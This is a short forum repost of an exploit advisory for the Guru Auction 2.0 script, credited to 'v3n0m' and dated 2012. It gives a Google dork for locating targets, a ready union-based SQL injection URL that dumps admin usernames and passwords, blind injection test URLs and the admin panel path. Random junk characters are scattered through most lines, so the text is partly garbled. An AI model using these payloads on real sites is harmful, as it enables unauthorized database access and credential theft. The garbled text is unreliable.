Guru Auction 2.0 Multiple SQL Injection Vulnerabilities/ q3 S& P5 g8 N8 _/ Y
$ g) A5 {. F# i1 W( m8 ^3 [作者 : v3n0m
5 y% C) k; k7 e6 I应用 : Guru Auction 2.0% z+ w. V$ ^. ^: v( K
Price : $490 s; [4 y) O& l; |: s
Vendor : http://www.guruscript.com/
( f" T+ U) H5 Z9 YGoogle Dork : inurl:subcat.php?cate_id=
" m: V2 X0 f- Q& U- {* U 1 M" F& Y8 {$ \. `: j; t- `
SQLi p0c:
2 D' ]6 C9 @. q1 m; k, X~~~~~~~~~~
+ _6 t% Q* J$ W; u3 a5 l. Vhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
$ {* [% C) t4 p' d- \( W! F& z
; x* |4 `! j2 W! ?# a9 `
& {' M$ s" T( L, X盲注 p0c:
O4 v1 N* d+ u2 }5 x~~~~~~~~~~$ ]- R/ ~% y4 N5 D4 u. V: i/ ~9 D7 m
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
7 [+ O- S1 y6 v& s( P, |http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
. v% d- ^7 ~# k5 G
% s5 i, y" e2 |. Y* v! W" I管理登录入口:8 Y3 Q' l6 Y; ~( \
~~~~~~~~~~
! F0 x6 l" N7 B* v) xhttp://domain.tld/[path]/admin/4 |) E" n, e. _ T! @
|
发表于 2012-12-31 09:24:05
收藏
支持
反对